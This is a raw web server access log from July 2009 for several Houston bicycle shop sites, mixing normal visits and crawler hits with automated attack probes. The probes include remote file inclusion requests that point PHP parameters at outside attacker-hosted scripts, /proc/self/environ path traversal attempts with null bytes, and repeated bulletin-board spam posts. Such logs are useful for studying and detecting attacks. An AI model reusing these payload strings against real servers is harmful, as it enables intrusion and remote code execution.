81.19.66.38 - - [13/Jul/2009:10:12:38 -0700] "GET /bullitinboard/viewtopic.php?p=2005 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.67.243 - - [13/Jul/2009:10:24:01 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
208.115.138.254 - - [13/Jul/2009:10:32:48 -0700] "GET / HTTP/1.1" 200 1764 "-" "Mozilla/4.0" "www.svbikes.com"
38.98.240.122 - - [13/Jul/2009:10:32:48 -0700] "GET / HTTP/1.1" 200 1764 "http://search.yahoo.com/search?p=svbikes&ei=utf-8&fr=b2ie7" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; MS-RTC LM 8; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "www.svbikes.com"
38.98.240.122 - - [13/Jul/2009:10:32:49 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; MS-RTC LM 8; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "www.svbikes.com"
208.115.138.254 - - [13/Jul/2009:10:32:57 -0700] "GET /logs HTTP/1.1" 301 91 "-" "Mozilla/4.0" "www.svbikes.com"
208.115.138.254 - - [13/Jul/2009:10:32:57 -0700] "GET /logs/ HTTP/1.1" 200 2368 "-" "Mozilla/4.0" "www.svbikes.com"
38.98.240.122 - - [13/Jul/2009:10:32:57 -0700] "GET /logs/ HTTP/1.1" 200 2368 "http://www.svbikes.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; MS-RTC LM 8; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "www.svbikes.com"
208.115.138.254 - - [13/Jul/2009:10:33:03 -0700] "GET /tmp HTTP/1.1" 301 90 "-" "Mozilla/4.0" "www.svbikes.com"
208.115.138.254 - - [13/Jul/2009:10:33:04 -0700] "GET /tmp/ HTTP/1.1" 200 659 "-" "Mozilla/4.0" "www.svbikes.com"
38.98.240.122 - - [13/Jul/2009:10:33:04 -0700] "GET /tmp/ HTTP/1.1" 200 659 "http://www.svbikes.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; MS-RTC LM 8; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "www.svbikes.com"
208.115.138.254 - - [13/Jul/2009:10:33:06 -0700] "GET /translations HTTP/1.1" 301 99 "-" "Mozilla/4.0" "www.svbikes.com"
208.115.138.254 - - [13/Jul/2009:10:33:06 -0700] "GET /translations/ HTTP/1.1" 200 3847 "-" "Mozilla/4.0" "www.svbikes.com"
38.98.240.122 - - [13/Jul/2009:10:33:06 -0700] "GET /translations/ HTTP/1.1" 200 3847 "http://www.svbikes.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; MS-RTC LM 8; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "www.svbikes.com"
208.115.138.254 - - [13/Jul/2009:10:33:09 -0700] "GET /Employeesite HTTP/1.1" 401 395 "-" "Mozilla/4.0" "www.svbikes.com"
38.98.240.122 - - [13/Jul/2009:10:33:09 -0700] "GET /Employeesite/ HTTP/1.1" 401 395 "http://www.svbikes.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; MS-RTC LM 8; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "www.svbikes.com"
208.115.138.254 - - [13/Jul/2009:10:33:21 -0700] "GET /bullitinboard HTTP/1.1" 301 100 "-" "Mozilla/4.0" "www.svbikes.com"
208.115.138.254 - - [13/Jul/2009:10:33:23 -0700] "GET /bullitinboard/ HTTP/1.1" 200 533 "-" "Mozilla/4.0" "www.svbikes.com"
38.98.240.122 - - [13/Jul/2009:10:33:24 -0700] "GET /bullitinboard/ HTTP/1.1" 200 533 "http://search.yahoo.com/search?p=svbikes&ei=utf-8&fr=b2ie7" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; MS-RTC LM 8; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "www.svbikes.com"
204.136.184.77 - - [13/Jul/2009:10:38:06 -0700] "GET / HTTP/1.1" 200 1764 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.svbikes.com"
91.121.150.170 - - [13/Jul/2009:10:59:19 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
91.121.150.170 - - [13/Jul/2009:10:59:19 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
91.121.150.170 - - [13/Jul/2009:11:07:16 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
91.121.150.170 - - [13/Jul/2009:11:10:25 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
91.121.89.135 - - [13/Jul/2009:11:12:54 -0700] "GET /body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
91.121.89.135 - - [13/Jul/2009:11:12:54 -0700] "GET /logs/access.log%20%20/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
91.121.89.135 - - [13/Jul/2009:11:12:54 -0700] "GET /logs/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
91.121.150.170 - - [13/Jul/2009:11:13:06 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
58.61.164.139 - - [13/Jul/2009:11:14:53 -0700] "GET /robots.txt HTTP/1.1" 404 275 "http://bicyclestoreshouston.com/robots.txt" "Sosospider+(+http://help.soso.com/webspider.htm)" "bicyclestoreshouston.com"
91.121.150.170 - - [13/Jul/2009:11:16:15 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
218.246.20.221 - - [13/Jul/2009:11:24:12 -0700] "GET /logs/access.log%20%20/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.hit168.com.cn/module/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
218.246.20.221 - - [13/Jul/2009:11:24:12 -0700] "GET /body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.hit168.com.cn/module/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
218.246.20.221 - - [13/Jul/2009:11:24:12 -0700] "GET /logs/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.hit168.com.cn/module/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
91.121.150.170 - - [13/Jul/2009:11:29:46 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
222.162.115.67 - - [13/Jul/2009:11:30:50 -0700] "GET /translations/French.txt//?_SERVER[DOCUMENT_ROOT]=http://shanghaisisa.com/skin/ide.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "bicyclestoreshouston.com"
222.162.115.67 - - [13/Jul/2009:11:30:51 -0700] "GET /translations/French.txt//?_SERVER[DOCUMENT_ROOT]=http://shanghaisisa.com/skin/ide.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "bicyclestoreshouston.com"
222.162.115.67 - - [13/Jul/2009:11:30:51 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://shanghaisisa.com/skin/ide.txt?? HTTP/1.1" 200 1764 "-" "libwww-perl/5.79" "bicyclestoreshouston.com"
222.162.115.67 - - [13/Jul/2009:11:30:51 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://shanghaisisa.com/skin/ide.txt?? HTTP/1.1" 200 1764 "-" "libwww-perl/5.79" "bicyclestoreshouston.com"
222.162.115.67 - - [13/Jul/2009:11:30:52 -0700] "GET /translations//?_SERVER[DOCUMENT_ROOT]=http://shanghaisisa.com/skin/ide.txt?? HTTP/1.1" 200 3860 "-" "libwww-perl/5.79" "bicyclestoreshouston.com"
222.162.115.67 - - [13/Jul/2009:11:30:52 -0700] "GET /translations//?_SERVER[DOCUMENT_ROOT]=http://shanghaisisa.com/skin/ide.txt?? HTTP/1.1" 200 3860 "-" "libwww-perl/5.79" "bicyclestoreshouston.com"
91.121.150.170 - - [13/Jul/2009:11:41:20 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
91.121.150.170 - - [13/Jul/2009:11:47:20 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
65.55.106.235 - - [13/Jul/2009:11:49:44 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.svbikes.com"
91.121.150.170 - - [13/Jul/2009:12:17:53 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
119.63.198.19 - - [13/Jul/2009:12:18:55 -0700] "GET /bullitinboard/viewtopic.php?p=15928 HTTP/1.1" 200 533 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "bicyclestoreshouston.com"
208.80.195.43 - - [13/Jul/2009:12:21:00 -0700] "GET / HTTP/1.0" 200 1748 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 1.1.4322; HbTools 4.7.7; IEMB3; .NET CLR 2.0.50727; SeekmoToolbar 4.8.4; IEMB3)" "svbikes.com"
72.55.179.121 - - [13/Jul/2009:12:22:35 -0700] "GET /index.php?page=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
72.55.179.121 - - [13/Jul/2009:12:22:35 -0700] "GET /translations/Spanish.txt/index.php?page=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
72.55.179.121 - - [13/Jul/2009:12:22:35 -0700] "GET /translations/index.php?page=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
91.121.150.170 - - [13/Jul/2009:12:29:39 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.0" 200 518 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
91.121.150.170 - - [13/Jul/2009:12:35:24 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
81.19.66.38 - - [13/Jul/2009:12:46:19 -0700] "GET /bullitinboard/viewtopic.php?p=1624 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [13/Jul/2009:12:46:20 -0700] "GET /bullitinboard/viewtopic.php?p=1625 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [13/Jul/2009:12:46:20 -0700] "GET /bullitinboard/viewtopic.php?p=1663 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [13/Jul/2009:12:46:21 -0700] "GET /bullitinboard/viewtopic.php?p=1968 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [13/Jul/2009:12:46:21 -0700] "GET /bullitinboard/viewtopic.php?p=1972 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
83.170.112.243 - - [13/Jul/2009:12:56:08 -0700] "GET /logs/access.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://scairo.com/templates/beez/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
83.170.112.243 - - [13/Jul/2009:12:56:08 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://scairo.com/templates/beez/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
83.170.112.243 - - [13/Jul/2009:12:56:08 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://scairo.com/templates/beez/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
76.30.226.163 - - [13/Jul/2009:12:58:28 -0700] "GET / HTTP/1.1" 200 1764 "http://locator.trekbikes.com/locator/search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.1.4322)" "www.svbikes.com"
76.30.226.163 - - [13/Jul/2009:12:58:35 -0700] "GET / HTTP/1.1" 200 1764 "http://locator.trekbikes.com/locator/search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.1.4322)" "www.svbikes.com"
65.55.106.169 - - [13/Jul/2009:13:01:22 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.svbikes.com"
208.80.195.39 - - [13/Jul/2009:13:02:01 -0700] "GET / HTTP/1.0" 200 1748 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; ESB{241C8E16-CBB4-4322-83CF-BEFB6C356022}; ESB{7EAC2C3D-8ED4-49D6-9B57-973AA37B0E30}; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.svbikes.com"
211.115.213.35 - - [13/Jul/2009:13:10:59 -0700] "GET /logs/access.log/appserv/main.php?appserv_root=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
211.115.213.35 - - [13/Jul/2009:13:11:00 -0700] "GET /logs/appserv/main.php?appserv_root=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
211.115.213.35 - - [13/Jul/2009:13:11:00 -0700] "GET /appserv/main.php?appserv_root=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
124.115.1.7 - - [13/Jul/2009:13:19:34 -0700] "GET / HTTP/1.1" 200 1764 "http://bicyclestoreshouston.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "bicyclestoreshouston.com"
58.61.164.40 - - [13/Jul/2009:13:21:57 -0700] "GET / HTTP/1.1" 200 1764 "http://bicyclestoreshouston.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "bicyclestoreshouston.com"
58.61.164.141 - - [13/Jul/2009:13:23:56 -0700] "GET / HTTP/1.1" 200 1764 "http://bicyclestoreshouston.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "bicyclestoreshouston.com"
58.61.164.39 - - [13/Jul/2009:13:25:10 -0700] "GET / HTTP/1.1" 200 1764 "http://bicyclestoreshouston.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "bicyclestoreshouston.com"
65.55.106.122 - - [13/Jul/2009:13:29:20 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "bicyclestoreshouston.com"
58.61.164.139 - - [13/Jul/2009:13:30:40 -0700] "GET / HTTP/1.1" 200 1764 "http://bicyclestoreshouston.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "bicyclestoreshouston.com"
124.51.219.56 - - [13/Jul/2009:13:37:34 -0700] "GET /logs/%20skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "houstonbikeshop.com"
124.51.219.56 - - [13/Jul/2009:13:37:34 -0700] "GET /logs/access.log/%20skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "houstonbikeshop.com"
124.51.219.56 - - [13/Jul/2009:13:37:35 -0700] "GET /%20skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "houstonbikeshop.com"
124.51.219.56 - - [13/Jul/2009:13:37:35 -0700] "GET /logs/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "houstonbikeshop.com"
124.51.219.56 - - [13/Jul/2009:13:37:35 -0700] "GET /logs/access.log/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "houstonbikeshop.com"
124.51.219.56 - - [13/Jul/2009:13:37:35 -0700] "GET /errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "houstonbikeshop.com"
124.51.219.56 - - [13/Jul/2009:13:37:35 -0700] "GET /logs/%20skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "houstonbikeshop.com"
124.51.219.56 - - [13/Jul/2009:13:37:36 -0700] "GET /logs/access.log/%20skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "houstonbikeshop.com"
124.51.219.56 - - [13/Jul/2009:13:37:36 -0700] "GET /%20skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "houstonbikeshop.com"
124.51.219.56 - - [13/Jul/2009:13:37:36 -0700] "GET /logs/%20skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "houstonbikeshop.com"
124.51.219.56 - - [13/Jul/2009:13:37:36 -0700] "GET /logs/access.log/%20skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "houstonbikeshop.com"
124.51.219.56 - - [13/Jul/2009:13:37:36 -0700] "GET /%20skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "houstonbikeshop.com"
76.30.226.163 - - [13/Jul/2009:13:38:16 -0700] "GET / HTTP/1.1" 200 1764 "http://locator.trekbikes.com/locator/search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.1.4322)" "www.svbikes.com"
218.38.136.251 - - [13/Jul/2009:13:44:17 -0700] "GET /logs/access.log/appserv/main.php?appserv_root=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "houstonbikeshop.com"
218.38.136.251 - - [13/Jul/2009:13:44:17 -0700] "GET /appserv/main.php?appserv_root=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "houstonbikeshop.com"
218.38.136.251 - - [13/Jul/2009:13:44:17 -0700] "GET /logs/appserv/main.php?appserv_root=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "houstonbikeshop.com"
218.38.136.251 - - [13/Jul/2009:13:45:37 -0700] "GET /logs/access.log%20/appserv/main.php?appserv_root=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "houstonbikeshop.com"
158.116.112.10 - - [13/Jul/2009:13:47:05 -0700] "GET / HTTP/1.1" 200 1764 "http://locator.trekbikes.com/locator/search/?location=San Antonio, TX, USA" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "www.svbikes.com"
211.115.213.35 - - [13/Jul/2009:13:49:17 -0700] "GET /logs/access.log/appserv/main.php?appserv_root=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
211.115.213.35 - - [13/Jul/2009:13:49:17 -0700] "GET /logs/appserv/main.php?appserv_root=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
211.115.213.35 - - [13/Jul/2009:13:49:18 -0700] "GET /appserv/main.php?appserv_root=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
211.115.213.35 - - [13/Jul/2009:13:51:42 -0700] "GET /logs/access.log%20/appserv/main.php?appserv_root=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
66.71.241.146 - - [13/Jul/2009:13:53:40 -0700] "GET /translations/Swedish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
66.71.241.146 - - [13/Jul/2009:13:56:27 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
66.71.241.146 - - [13/Jul/2009:13:56:27 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
66.71.241.146 - - [13/Jul/2009:13:56:27 -0700] "GET /translations/Korean.txt//tools/send_reminders.php?noSet=0&includedir=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
81.19.66.38 - - [13/Jul/2009:14:02:13 -0700] "GET /bullitinboard/viewtopic.php?p=1625 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [13/Jul/2009:14:02:14 -0700] "GET /bullitinboard/viewtopic.php?p=1663 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [13/Jul/2009:14:02:15 -0700] "GET /bullitinboard/viewtopic.php?p=1968 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [13/Jul/2009:14:02:15 -0700] "GET /bullitinboard/viewtopic.php?p=1972 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [13/Jul/2009:14:02:16 -0700] "GET /bullitinboard/viewtopic.php?p=2005 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
66.178.116.28 - - [13/Jul/2009:14:03:55 -0700] "GET /translations/Hungarian.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
66.178.116.28 - - [13/Jul/2009:14:03:56 -0700] "GET /translations/Swedish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
213.171.225.234 - - [13/Jul/2009:14:06:15 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
213.171.225.234 - - [13/Jul/2009:14:06:15 -0700] "GET /translations/Russian.txt//tools/send_reminders.php?noSet=0&includedir=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
213.171.225.234 - - [13/Jul/2009:14:06:15 -0700] "GET /translations/Spanish.txt//tools/send_reminders.php?noSet=0&includedir=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
213.171.225.234 - - [13/Jul/2009:14:06:15 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
65.55.106.122 - - [13/Jul/2009:14:07:13 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.svbikes.com"
213.171.225.234 - - [13/Jul/2009:14:08:28 -0700] "GET /translations/Korean.txt//tools/send_reminders.php?noSet=0&includedir=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
66.178.116.28 - - [13/Jul/2009:14:11:32 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
66.178.116.28 - - [13/Jul/2009:14:11:32 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
66.178.116.28 - - [13/Jul/2009:14:11:32 -0700] "GET /translations/Korean.txt//tools/send_reminders.php?noSet=0&includedir=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
207.57.79.26 - - [13/Jul/2009:14:13:43 -0700] "GET /translations/Hungarian.txt//tools/send_reminders.php?noSet=0&includedir=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "houstonbikeshop.com"
